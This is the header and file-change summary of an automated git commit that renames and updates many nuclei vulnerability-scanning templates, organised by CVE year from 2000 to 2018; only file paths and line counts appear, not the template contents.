From 65ead6603aa76aeace95d7b70883627076be2ee2 Mon Sep 17 00:00:00 2001 
From: test Date: Sat, 14 Sep 2024 02:20:31 +0000 Subject: [PATCH] Auto Updated --- README.md | 388 +- data.json | 3 +- data1.json | 352 +- links.csv | 1 + ...{cve-2000-0114.yaml => CVE-2000-0114.yaml} | 0 nuclei-templates/CVE-2001/CVE-2001-0537.yaml | 14 +- ...{CVE-2001-1473.yaml => cve-2001-1473.yaml} | 0 nuclei-templates/CVE-2003/CVE-2003-1598.yaml | 20 +- nuclei-templates/CVE-2003/CVE-2003-1599.yaml | 13 +- nuclei-templates/CVE-2004/CVE-2004-1559.yaml | 20 +- nuclei-templates/CVE-2004/CVE-2004-1584.yaml | 19 +- nuclei-templates/CVE-2004/CVE-2004-1965.yaml | 7 +- nuclei-templates/CVE-2005/CVE-2005-1102.yaml | 12 +- nuclei-templates/CVE-2005/CVE-2005-1687.yaml | 17 +- nuclei-templates/CVE-2005/CVE-2005-1688.yaml | 15 +- nuclei-templates/CVE-2005/CVE-2005-1810.yaml | 15 +- nuclei-templates/CVE-2005/CVE-2005-2107.yaml | 11 +- nuclei-templates/CVE-2005/CVE-2005-2108.yaml | 17 +- nuclei-templates/CVE-2005/CVE-2005-2109.yaml | 11 +- nuclei-templates/CVE-2005/CVE-2005-2110.yaml | 13 +- nuclei-templates/CVE-2005/CVE-2005-2428.yaml | 33 + nuclei-templates/CVE-2005/CVE-2005-2612.yaml | 10 +- nuclei-templates/CVE-2005/CVE-2005-3634.yaml | 11 +- nuclei-templates/CVE-2005/CVE-2005-4463.yaml | 15 +- nuclei-templates/CVE-2005/cve-2005-2428.yaml | 25 - nuclei-templates/CVE-2005/cve-2005-3344.yaml | 28 +- ...{CVE-2005-4385.yaml => cve-2005-4385.yaml} | 0 nuclei-templates/CVE-2006/CVE-2006-0985.yaml | 15 +- nuclei-templates/CVE-2006/CVE-2006-0986.yaml | 14 +- nuclei-templates/CVE-2006/CVE-2006-1012.yaml | 13 +- nuclei-templates/CVE-2006/CVE-2006-1263.yaml | 15 +- ...{cve-2006-1681.yaml => CVE-2006-1681.yaml} | 0 nuclei-templates/CVE-2006/CVE-2006-1796.yaml | 10 +- nuclei-templates/CVE-2006/CVE-2006-2667.yaml | 17 +- nuclei-templates/CVE-2006/CVE-2006-2702.yaml | 16 +- nuclei-templates/CVE-2006/CVE-2006-3390.yaml | 16 +- nuclei-templates/CVE-2006/CVE-2006-4028.yaml | 16 +- nuclei-templates/CVE-2006/CVE-2006-4208.yaml | 15 +- nuclei-templates/CVE-2006/CVE-2006-4743.yaml | 12 +- 
nuclei-templates/CVE-2006/CVE-2006-5705.yaml | 18 +- nuclei-templates/CVE-2006/CVE-2006-6016.yaml | 12 +- nuclei-templates/CVE-2006/CVE-2006-6017.yaml | 11 +- nuclei-templates/CVE-2006/CVE-2006-6808.yaml | 17 +- nuclei-templates/CVE-2007/CVE-2007-0106.yaml | 16 +- nuclei-templates/CVE-2007/CVE-2007-0107.yaml | 20 +- nuclei-templates/CVE-2007/CVE-2007-0109.yaml | 16 +- nuclei-templates/CVE-2007/CVE-2007-0233.yaml | 12 +- nuclei-templates/CVE-2007/CVE-2007-0262.yaml | 10 +- nuclei-templates/CVE-2007/CVE-2007-0539.yaml | 17 +- nuclei-templates/CVE-2007/CVE-2007-0541.yaml | 17 +- nuclei-templates/CVE-2007/CVE-2007-0885.yaml | 34 - nuclei-templates/CVE-2007/CVE-2007-1049.yaml | 24 +- nuclei-templates/CVE-2007/CVE-2007-1230.yaml | 14 +- nuclei-templates/CVE-2007/CVE-2007-1244.yaml | 16 +- nuclei-templates/CVE-2007/CVE-2007-1277.yaml | 23 +- nuclei-templates/CVE-2007/CVE-2007-1599.yaml | 18 +- nuclei-templates/CVE-2007/CVE-2007-1622.yaml | 21 +- nuclei-templates/CVE-2007/CVE-2007-1893.yaml | 15 +- nuclei-templates/CVE-2007/CVE-2007-1894.yaml | 23 +- nuclei-templates/CVE-2007/CVE-2007-1897.yaml | 22 +- nuclei-templates/CVE-2007/CVE-2007-4556.yaml | 34 - nuclei-templates/CVE-2007/CVE-2007-5728.yaml | 38 - nuclei-templates/CVE-2007/cve-2007-0885.yaml | 29 + nuclei-templates/CVE-2007/cve-2007-4556.yaml | 30 + nuclei-templates/CVE-2007/cve-2007-5728.yaml | 32 + nuclei-templates/CVE-2008/CVE-2008-1059.yaml | 27 +- nuclei-templates/CVE-2008/CVE-2008-1061.yaml | 39 +- nuclei-templates/CVE-2008/CVE-2008-1547.yaml | 14 +- ...{cve-2008-2398.yaml => CVE-2008-2398.yaml} | 0 ...{cve-2008-2650.yaml => CVE-2008-2650.yaml} | 0 nuclei-templates/CVE-2008/CVE-2008-4668.yaml | 11 +- nuclei-templates/CVE-2008/CVE-2008-5587.yaml | 19 +- nuclei-templates/CVE-2008/CVE-2008-6465.yaml | 22 +- nuclei-templates/CVE-2008/CVE-2008-6982.yaml | 24 +- nuclei-templates/CVE-2008/CVE-2008-7269.yaml | 14 +- ...{CVE-2008-6172.yaml => cve-2008-6172.yaml} | 0 ...{CVE-2008-6222.yaml => cve-2008-6222.yaml} | 0 
nuclei-templates/CVE-2009/CVE-2009-0347.yaml | 5 +- ...{cve-2009-1496.yaml => CVE-2009-1496.yaml} | 0 nuclei-templates/CVE-2009/CVE-2009-1872.yaml | 9 +- ...{cve-2009-2100.yaml => CVE-2009-2100.yaml} | 0 ...{cve-2009-3318.yaml => CVE-2009-3318.yaml} | 0 nuclei-templates/CVE-2009/CVE-2009-4202.yaml | 19 +- ...{CVE-2009-2015.yaml => cve-2009-2015.yaml} | 0 ...{CVE-2009-4679.yaml => cve-2009-4679.yaml} | 0 ...{CVE-2009-5020.yaml => cve-2009-5020.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-0759.yaml | 28 - nuclei-templates/CVE-2010/CVE-2010-1081.yaml | 26 - nuclei-templates/CVE-2010/CVE-2010-1302.yaml | 26 - nuclei-templates/CVE-2010/CVE-2010-1304.yaml | 15 +- ...{cve-2010-1305.yaml => CVE-2010-1305.yaml} | 0 ...{cve-2010-1306.yaml => CVE-2010-1306.yaml} | 0 ...{cve-2010-1313.yaml => CVE-2010-1313.yaml} | 0 ...{cve-2010-1314.yaml => CVE-2010-1314.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1429.yaml | 27 +- nuclei-templates/CVE-2010/CVE-2010-1461.yaml | 17 +- nuclei-templates/CVE-2010/CVE-2010-1470.yaml | 13 +- ...{cve-2010-1475.yaml => CVE-2010-1475.yaml} | 0 ...{cve-2010-1495.yaml => CVE-2010-1495.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1532.yaml | 28 - ...{cve-2010-1535.yaml => CVE-2010-1535.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1540.yaml | 13 +- nuclei-templates/CVE-2010/CVE-2010-1586.yaml | 6 +- ...{cve-2010-1602.yaml => CVE-2010-1602.yaml} | 0 ...{cve-2010-1603.yaml => CVE-2010-1603.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1653.yaml | 13 +- ...{cve-2010-1715.yaml => CVE-2010-1715.yaml} | 0 ...{cve-2010-1722.yaml => CVE-2010-1722.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1723.yaml | 28 - ...{cve-2010-1870.yaml => CVE-2010-1870.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1952.yaml | 13 +- ...{cve-2010-1954.yaml => CVE-2010-1954.yaml} | 0 ...{cve-2010-1956.yaml => CVE-2010-1956.yaml} | 0 ...{cve-2010-1981.yaml => CVE-2010-1981.yaml} | 0 ...{cve-2010-1982.yaml => CVE-2010-1982.yaml} | 0 ...{cve-2010-2033.yaml => CVE-2010-2033.yaml} | 0 
nuclei-templates/CVE-2010/CVE-2010-2034.yaml | 9 +- ...{cve-2010-2035.yaml => CVE-2010-2035.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-2037.yaml | 16 +- nuclei-templates/CVE-2010/CVE-2010-2045.yaml | 17 +- nuclei-templates/CVE-2010/CVE-2010-2259.yaml | 29 - ...{cve-2010-2307.yaml => CVE-2010-2307.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-2507.yaml | 20 +- ...{cve-2010-2680.yaml => CVE-2010-2680.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-2857.yaml | 32 - nuclei-templates/CVE-2010/CVE-2010-2918.yaml | 29 - ...{cve-2010-2920.yaml => CVE-2010-2920.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-3426.yaml | 9 +- ...{cve-2010-4617.yaml => CVE-2010-4617.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-4719.yaml | 11 +- nuclei-templates/CVE-2010/CVE-2010-4977.yaml | 29 - ...{cve-2010-5278.yaml => CVE-2010-5278.yaml} | 0 ...{CVE-2010-0157.yaml => cve-2010-0157.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-0219.yaml | 29 +- nuclei-templates/CVE-2010/cve-2010-0759.yaml | 27 + ...{CVE-2010-0942.yaml => cve-2010-0942.yaml} | 0 ...{CVE-2010-0944.yaml => cve-2010-0944.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-1081.yaml | 27 + ...{CVE-2010-1217.yaml => cve-2010-1217.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-1302.yaml | 27 + ...{CVE-2010-1352.yaml => cve-2010-1352.yaml} | 0 ...{CVE-2010-1353.yaml => cve-2010-1353.yaml} | 0 ...{CVE-2010-1354.yaml => cve-2010-1354.yaml} | 0 ...{CVE-2010-1472.yaml => cve-2010-1472.yaml} | 0 ...{CVE-2010-1473.yaml => cve-2010-1473.yaml} | 0 ...{CVE-2010-1491.yaml => cve-2010-1491.yaml} | 0 ...{CVE-2010-1531.yaml => cve-2010-1531.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-1532.yaml | 27 + ...{CVE-2010-1601.yaml => cve-2010-1601.yaml} | 0 ...{CVE-2010-1657.yaml => cve-2010-1657.yaml} | 0 ...{CVE-2010-1718.yaml => cve-2010-1718.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-1723.yaml | 27 + ...{CVE-2010-1979.yaml => cve-2010-1979.yaml} | 0 ...{CVE-2010-2036.yaml => cve-2010-2036.yaml} | 0 ...{CVE-2010-2050.yaml => cve-2010-2050.yaml} | 0 
...{CVE-2010-2128.yaml => cve-2010-2128.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-2259.yaml | 27 + nuclei-templates/CVE-2010/cve-2010-2857.yaml | 27 + nuclei-templates/CVE-2010/cve-2010-2918.yaml | 27 + ...{CVE-2010-3203.yaml => cve-2010-3203.yaml} | 0 ...{CVE-2010-4239.yaml => cve-2010-4239.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-4977.yaml | 27 + nuclei-templates/CVE-2011/CVE-2011-0049.yaml | 30 - ...{cve-2011-1669.yaml => CVE-2011-1669.yaml} | 0 nuclei-templates/CVE-2011/CVE-2011-2523.yaml | 5 +- nuclei-templates/CVE-2011/CVE-2011-4336.yaml | 41 - nuclei-templates/CVE-2011/CVE-2011-4624.yaml | 10 +- nuclei-templates/CVE-2011/CVE-2011-4926.yaml | 33 - ...{cve-2011-5107.yaml => CVE-2011-5107.yaml} | 0 ...{cve-2011-5179.yaml => CVE-2011-5179.yaml} | 0 nuclei-templates/CVE-2011/CVE-2011-5181.yaml | 34 - nuclei-templates/CVE-2011/CVE-2011-5252.yaml | 14 +- ...{cve-2011-5265.yaml => CVE-2011-5265.yaml} | 0 nuclei-templates/CVE-2011/cve-2011-0049.yaml | 29 + nuclei-templates/CVE-2011/cve-2011-4336.yaml | 38 + nuclei-templates/CVE-2011/cve-2011-4926.yaml | 30 + nuclei-templates/CVE-2011/cve-2011-5181.yaml | 30 + nuclei-templates/CVE-2012/CVE-2012-0392.yaml | 10 +- nuclei-templates/CVE-2012/CVE-2012-0394.yaml | 28 +- nuclei-templates/CVE-2012/CVE-2012-0896.yaml | 15 +- nuclei-templates/CVE-2012/CVE-2012-0991.yaml | 28 - nuclei-templates/CVE-2012/CVE-2012-0996.yaml | 15 +- nuclei-templates/CVE-2012/CVE-2012-2122.yaml | 61 + nuclei-templates/CVE-2012/CVE-2012-4032.yaml | 31 +- nuclei-templates/CVE-2012/CVE-2012-4253.yaml | 13 +- nuclei-templates/CVE-2012/CVE-2012-4547.yaml | 10 +- nuclei-templates/CVE-2012/CVE-2012-4768.yaml | 33 - nuclei-templates/CVE-2012/CVE-2012-4940.yaml | 31 - nuclei-templates/CVE-2012/CVE-2012-4982.yaml | 9 +- nuclei-templates/CVE-2012/CVE-2012-5321.yaml | 20 +- nuclei-templates/CVE-2012/CVE-2012-6499.yaml | 26 +- ...{CVE-2012-0901.yaml => cve-2012-0901.yaml} | 0 ...{CVE-2012-0981.yaml => cve-2012-0981.yaml} | 0 
nuclei-templates/CVE-2012/cve-2012-0991.yaml | 27 + ...{CVE-2012-3153.yaml => cve-2012-3153.yaml} | 0 nuclei-templates/CVE-2012/cve-2012-4768.yaml | 30 + nuclei-templates/CVE-2012/cve-2012-4940.yaml | 25 + ...{CVE-2012-5913.yaml => cve-2012-5913.yaml} | 0 nuclei-templates/CVE-2013/CVE-2013-1965.yaml | 32 - nuclei-templates/CVE-2013/CVE-2013-2248.yaml | 21 - ...{cve-2013-2251.yaml => CVE-2013-2251.yaml} | 0 nuclei-templates/CVE-2013/CVE-2013-2287.yaml | 32 - nuclei-templates/CVE-2013/CVE-2013-2621.yaml | 15 +- ...{cve-2013-3827.yaml => CVE-2013-3827.yaml} | 0 nuclei-templates/CVE-2013/CVE-2013-4117.yaml | 32 - nuclei-templates/CVE-2013/CVE-2013-6281.yaml | 41 + nuclei-templates/CVE-2013/CVE-2013-7285.yaml | 10 +- nuclei-templates/CVE-2013/cve-2013-1965.yaml | 29 + nuclei-templates/CVE-2013/cve-2013-2248.yaml | 20 + nuclei-templates/CVE-2013/cve-2013-2287.yaml | 30 + nuclei-templates/CVE-2013/cve-2013-4117.yaml | 30 + ...{CVE-2013-5528.yaml => cve-2013-5528.yaml} | 0 nuclei-templates/CVE-2013/cve-2013-6281.yaml | 49 - nuclei-templates/CVE-2014/CVE-2014-10037.yaml | 17 +- nuclei-templates/CVE-2014/CVE-2014-1203.yaml | 39 - ...{cve-2014-2323.yaml => CVE-2014-2323.yaml} | 0 nuclei-templates/CVE-2014/CVE-2014-4536.yaml | 36 - ...{cve-2014-4550.yaml => CVE-2014-4550.yaml} | 0 nuclei-templates/CVE-2014/CVE-2014-4558.yaml | 20 +- ...{cve-2014-4561.yaml => CVE-2014-4561.yaml} | 0 ...{cve-2014-4592.yaml => CVE-2014-4592.yaml} | 0 ...{cve-2014-4940.yaml => CVE-2014-4940.yaml} | 0 ...{cve-2014-5368.yaml => CVE-2014-5368.yaml} | 0 nuclei-templates/CVE-2014/CVE-2014-6271.yaml | 44 - nuclei-templates/CVE-2014/CVE-2014-6287.yaml | 8 +- nuclei-templates/CVE-2014/CVE-2014-8676.yaml | 19 +- nuclei-templates/CVE-2014/CVE-2014-8799.yaml | 12 +- nuclei-templates/CVE-2014/CVE-2014-9094.yaml | 24 - nuclei-templates/CVE-2014/CVE-2014-9119.yaml | 26 +- nuclei-templates/CVE-2014/CVE-2014-9180.yaml | 13 +- ...{cve-2014-9444.yaml => CVE-2014-9444.yaml} | 0 ...{cve-2014-9606.yaml => 
CVE-2014-9606.yaml} | 0 ...{cve-2014-9607.yaml => CVE-2014-9607.yaml} | 0 ...{cve-2014-9608.yaml => CVE-2014-9608.yaml} | 0 nuclei-templates/CVE-2014/CVE-2014-9614.yaml | 12 +- ...{cve-2014-9617.yaml => CVE-2014-9617.yaml} | 0 ...{cve-2014-9618.yaml => CVE-2014-9618.yaml} | 0 nuclei-templates/CVE-2014/cve-2014-1203.yaml | 51 + ...{CVE-2014-2383.yaml => cve-2014-2383.yaml} | 0 ...{CVE-2014-2908.yaml => cve-2014-2908.yaml} | 0 nuclei-templates/CVE-2014/cve-2014-3120.yaml | 16 +- ...{CVE-2014-3704.yaml => cve-2014-3704.yaml} | 0 ...{CVE-2014-4513.yaml => cve-2014-4513.yaml} | 0 ...{CVE-2014-4535.yaml => cve-2014-4535.yaml} | 0 nuclei-templates/CVE-2014/cve-2014-4536.yaml | 37 + nuclei-templates/CVE-2014/cve-2014-4942.yaml | 25 +- nuclei-templates/CVE-2014/cve-2014-6271.yaml | 44 + ...{CVE-2014-8682.yaml => cve-2014-8682.yaml} | 0 nuclei-templates/CVE-2014/cve-2014-9094.yaml | 29 + ...{CVE-2014-9615.yaml => cve-2014-9615.yaml} | 0 .../CVE-2015/CVE-2015-1000005.yaml | 21 +- .../CVE-2015/CVE-2015-1000010.yaml | 21 +- nuclei-templates/CVE-2015/CVE-2015-1579.yaml | 26 +- ...{cve-2015-1880.yaml => CVE-2015-1880.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-20067.yaml | 17 +- nuclei-templates/CVE-2015/CVE-2015-2068.yaml | 8 +- nuclei-templates/CVE-2015/CVE-2015-2196.yaml | 10 +- nuclei-templates/CVE-2015/CVE-2015-2755.yaml | 10 +- nuclei-templates/CVE-2015/CVE-2015-2794.yaml | 48 + nuclei-templates/CVE-2015/CVE-2015-2863.yaml | 8 +- nuclei-templates/CVE-2015/CVE-2015-2996.yaml | 27 +- nuclei-templates/CVE-2015/CVE-2015-3035.yaml | 24 +- nuclei-templates/CVE-2015/CVE-2015-3224.yaml | 43 - nuclei-templates/CVE-2015/CVE-2015-4062.yaml | 10 +- nuclei-templates/CVE-2015/CVE-2015-4063.yaml | 8 +- nuclei-templates/CVE-2015/CVE-2015-4074.yaml | 23 +- nuclei-templates/CVE-2015/CVE-2015-4127.yaml | 35 +- ...{cve-2015-4414.yaml => CVE-2015-4414.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-4666.yaml | 29 + nuclei-templates/CVE-2015/CVE-2015-4668.yaml | 30 - 
nuclei-templates/CVE-2015/CVE-2015-4694.yaml | 21 +- nuclei-templates/CVE-2015/CVE-2015-5354.yaml | 31 - nuclei-templates/CVE-2015/CVE-2015-5469.yaml | 21 +- nuclei-templates/CVE-2015/CVE-2015-5531.yaml | 9 +- ...{cve-2015-5688.yaml => CVE-2015-5688.yaml} | 0 ...{cve-2015-6477.yaml => CVE-2015-6477.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-6544.yaml | 35 - nuclei-templates/CVE-2015/CVE-2015-7245.yaml | 20 +- ...{cve-2015-7377.yaml => CVE-2015-7377.yaml} | 0 ...{cve-2015-7823.yaml => CVE-2015-7823.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-9312.yaml | 9 +- nuclei-templates/CVE-2015/CVE-2015-9323.yaml | 16 +- nuclei-templates/CVE-2015/CVE-2015-9414.yaml | 13 +- ...{cve-2015-9480.yaml => CVE-2015-9480.yaml} | 0 ...{CVE-2015-2166.yaml => cve-2015-2166.yaml} | 0 ...{CVE-2015-2807.yaml => cve-2015-2807.yaml} | 0 nuclei-templates/CVE-2015/cve-2015-3224.yaml | 57 + ...{CVE-2015-3306.yaml => cve-2015-3306.yaml} | 0 nuclei-templates/CVE-2015/cve-2015-4666.yaml | 35 - nuclei-templates/CVE-2015/cve-2015-4668.yaml | 43 + nuclei-templates/CVE-2015/cve-2015-5354.yaml | 42 + nuclei-templates/CVE-2015/cve-2015-6544.yaml | 36 + ...{CVE-2015-7450.yaml => cve-2015-7450.yaml} | 0 nuclei-templates/CVE-2015/cve-2015-8399.yaml | 9 +- ...016-1000126.yaml => CVE-2016-1000126.yaml} | 0 ...016-1000127.yaml => CVE-2016-1000127.yaml} | 0 ...016-1000128.yaml => CVE-2016-1000128.yaml} | 0 .../CVE-2016/CVE-2016-1000133.yaml | 34 - .../CVE-2016/CVE-2016-1000134.yaml | 34 - ...016-1000135.yaml => CVE-2016-1000135.yaml} | 0 ...016-1000138.yaml => CVE-2016-1000138.yaml} | 0 .../CVE-2016/CVE-2016-1000141.yaml | 40 - .../CVE-2016/CVE-2016-1000142.yaml | 34 - ...016-1000148.yaml => CVE-2016-1000148.yaml} | 0 ...016-1000149.yaml => CVE-2016-1000149.yaml} | 0 ...ve-2016-10033.yaml => CVE-2016-10033.yaml} | 0 nuclei-templates/CVE-2016/CVE-2016-10108.yaml | 10 +- nuclei-templates/CVE-2016/CVE-2016-10368.yaml | 22 +- nuclei-templates/CVE-2016/CVE-2016-10960.yaml | 39 - 
nuclei-templates/CVE-2016/CVE-2016-10973.yaml | 26 +- nuclei-templates/CVE-2016/CVE-2016-1555.yaml | 31 - ...{cve-2016-2004.yaml => CVE-2016-2004.yaml} | 0 ...{cve-2016-3088.yaml => CVE-2016-3088.yaml} | 0 nuclei-templates/CVE-2016/CVE-2016-3510.yaml | 39 +- nuclei-templates/CVE-2016/CVE-2016-4437.yaml | 10 +- ...{cve-2016-4975.yaml => CVE-2016-4975.yaml} | 0 nuclei-templates/CVE-2016/CVE-2016-6195.yaml | 33 +- nuclei-templates/CVE-2016/CVE-2016-6210.yaml | 8 +- nuclei-templates/CVE-2016/CVE-2016-6277.yaml | 29 - nuclei-templates/CVE-2016/CVE-2016-6601.yaml | 20 +- nuclei-templates/CVE-2016/CVE-2016-7834.yaml | 21 +- nuclei-templates/CVE-2016/CVE-2016-8706.yaml | 6 +- ...{CVE-2016-0957.yaml => cve-2016-0957.yaml} | 0 ...016-1000129.yaml => cve-2016-1000129.yaml} | 0 ...016-1000132.yaml => cve-2016-1000132.yaml} | 0 .../CVE-2016/cve-2016-1000133.yaml | 35 + .../CVE-2016/cve-2016-1000134.yaml | 35 + ...016-1000139.yaml => cve-2016-1000139.yaml} | 0 .../CVE-2016/cve-2016-1000141.yaml | 35 + .../CVE-2016/cve-2016-1000142.yaml | 37 + ...016-1000153.yaml => cve-2016-1000153.yaml} | 0 nuclei-templates/CVE-2016/cve-2016-10367.yaml | 22 +- ...VE-2016-10924.yaml => cve-2016-10924.yaml} | 0 nuclei-templates/CVE-2016/cve-2016-10940.yaml | 24 +- nuclei-templates/CVE-2016/cve-2016-10960.yaml | 34 + nuclei-templates/CVE-2016/cve-2016-1555.yaml | 47 + ...{CVE-2016-2389.yaml => cve-2016-2389.yaml} | 0 ...{CVE-2016-3081.yaml => cve-2016-3081.yaml} | 0 nuclei-templates/CVE-2016/cve-2016-3978.yaml | 30 +- ...{CVE-2016-4977.yaml => cve-2016-4977.yaml} | 0 ...{CVE-2016-5649.yaml => cve-2016-5649.yaml} | 0 nuclei-templates/CVE-2016/cve-2016-6277.yaml | 32 + ...{CVE-2016-8527.yaml => cve-2016-8527.yaml} | 0 .../CVE-2017/CVE-2017-1000029.yaml | 29 +- .../CVE-2017/CVE-2017-1000163.yaml | 27 +- .../CVE-2017/CVE-2017-1000486.yaml | 13 +- nuclei-templates/CVE-2017/CVE-2017-10075.yaml | 15 +- nuclei-templates/CVE-2017/CVE-2017-11165.yaml | 19 +- nuclei-templates/CVE-2017/CVE-2017-11512.yaml | 
50 + ...ve-2017-11610.yaml => CVE-2017-11610.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-11629.yaml | 18 +- nuclei-templates/CVE-2017/CVE-2017-12138.yaml | 45 +- nuclei-templates/CVE-2017/CVE-2017-12149.yaml | 0 nuclei-templates/CVE-2017/CVE-2017-12583.yaml | 28 +- ...ve-2017-12611.yaml => CVE-2017-12611.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-12617.yaml | 13 +- ...ve-2017-12794.yaml => CVE-2017-12794.yaml} | 0 ...ve-2017-14135.yaml => CVE-2017-14135.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-14186.yaml | 21 +- nuclei-templates/CVE-2017/CVE-2017-14524.yaml | 39 +- nuclei-templates/CVE-2017/CVE-2017-14622.yaml | 9 +- nuclei-templates/CVE-2017/CVE-2017-15287.yaml | 3 + nuclei-templates/CVE-2017/CVE-2017-15363.yaml | 15 +- ...ve-2017-15647.yaml => CVE-2017-15647.yaml} | 0 ...ve-2017-15944.yaml => CVE-2017-15944.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-16894.yaml | 59 + nuclei-templates/CVE-2017/CVE-2017-17731.yaml | 11 +- nuclei-templates/CVE-2017/CVE-2017-17736.yaml | 54 + ...ve-2017-18024.yaml => CVE-2017-18024.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-18487.yaml | 47 +- nuclei-templates/CVE-2017/CVE-2017-18490.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18491.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18492.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18493.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18494.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18496.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18500.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18501.yaml | 8 +- nuclei-templates/CVE-2017/CVE-2017-18502.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18505.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18516.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18517.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18518.yaml | 8 +- nuclei-templates/CVE-2017/CVE-2017-18527.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18528.yaml | 8 +- nuclei-templates/CVE-2017/CVE-2017-18529.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18530.yaml | 6 
+- nuclei-templates/CVE-2017/CVE-2017-18532.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18537.yaml | 8 +- nuclei-templates/CVE-2017/CVE-2017-18542.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18556.yaml | 48 +- nuclei-templates/CVE-2017/CVE-2017-18557.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18558.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18562.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18564.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18565.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18566.yaml | 6 +- ...ve-2017-18638.yaml => CVE-2017-18638.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-5645.yaml | 28 +- nuclei-templates/CVE-2017/CVE-2017-5689.yaml | 25 +- nuclei-templates/CVE-2017/CVE-2017-6361.yaml | 22 - nuclei-templates/CVE-2017/CVE-2017-7391.yaml | 7 +- nuclei-templates/CVE-2017/CVE-2017-7504.yaml | 48 - nuclei-templates/CVE-2017/CVE-2017-7855.yaml | 4 +- nuclei-templates/CVE-2017/CVE-2017-7925.yaml | 10 +- nuclei-templates/CVE-2017/CVE-2017-8229.yaml | 58 + nuclei-templates/CVE-2017/CVE-2017-9416.yaml | 8 +- ...{cve-2017-9506.yaml => CVE-2017-9506.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-9822.yaml | 20 +- ...017-1000027.yaml => cve-2017-1000027.yaml} | 0 nuclei-templates/CVE-2017/cve-2017-11512.yaml | 40 - ...VE-2017-11586.yaml => cve-2017-11586.yaml} | 0 ...VE-2017-12544.yaml => cve-2017-12544.yaml} | 0 ...VE-2017-12635.yaml => cve-2017-12635.yaml} | 0 ...VE-2017-14849.yaml => cve-2017-14849.yaml} | 0 ...VE-2017-18536.yaml => cve-2017-18536.yaml} | 0 nuclei-templates/CVE-2017/cve-2017-18598.yaml | 88 +- ...{CVE-2017-3528.yaml => cve-2017-3528.yaml} | 0 ...{CVE-2017-5521.yaml => cve-2017-5521.yaml} | 0 nuclei-templates/CVE-2017/cve-2017-5631.yaml | 25 +- ...{CVE-2017-5982.yaml => cve-2017-5982.yaml} | 0 nuclei-templates/CVE-2017/cve-2017-6361.yaml | 23 + nuclei-templates/CVE-2017/cve-2017-7529.yaml | 36 +- nuclei-templates/CVE-2017/cve-2017-8917.yaml | 11 +- ...{CVE-2017-9288.yaml => cve-2017-9288.yaml} | 0 
nuclei-templates/CVE-2017/cve-2017-9833.yaml | 27 +- nuclei-templates/CVE-2018/CVE-2018-0101.yaml | 7 +- ...{cve-2018-0296.yaml => CVE-2018-0296.yaml} | 0 ...018-1000129.yaml => CVE-2018-1000129.yaml} | 0 .../CVE-2018/CVE-2018-1000671.yaml | 44 + ...018-1000861.yaml => CVE-2018-1000861.yaml} | 0 ...ve-2018-10093.yaml => CVE-2018-10093.yaml} | 0 ...ve-2018-10095.yaml => CVE-2018-10095.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-10822.yaml | 14 +- nuclei-templates/CVE-2018/CVE-2018-11227.yaml | 23 +- nuclei-templates/CVE-2018/CVE-2018-11231.yaml | 15 +- ...ve-2018-11409.yaml => CVE-2018-11409.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-11473.yaml | 26 +- nuclei-templates/CVE-2018/CVE-2018-11709.yaml | 39 - ...ve-2018-11776.yaml => CVE-2018-11776.yaml} | 0 ...ve-2018-12054.yaml => CVE-2018-12054.yaml} | 0 ...{cve-2018-1207.yaml => CVE-2018-1207.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-12300.yaml | 39 + ...ve-2018-12634.yaml => CVE-2018-12634.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-12675.yaml | 44 + nuclei-templates/CVE-2018/CVE-2018-12909.yaml | 50 + nuclei-templates/CVE-2018/CVE-2018-13980.yaml | 36 - nuclei-templates/CVE-2018/CVE-2018-14013.yaml | 15 +- nuclei-templates/CVE-2018/CVE-2018-14064.yaml | 30 - 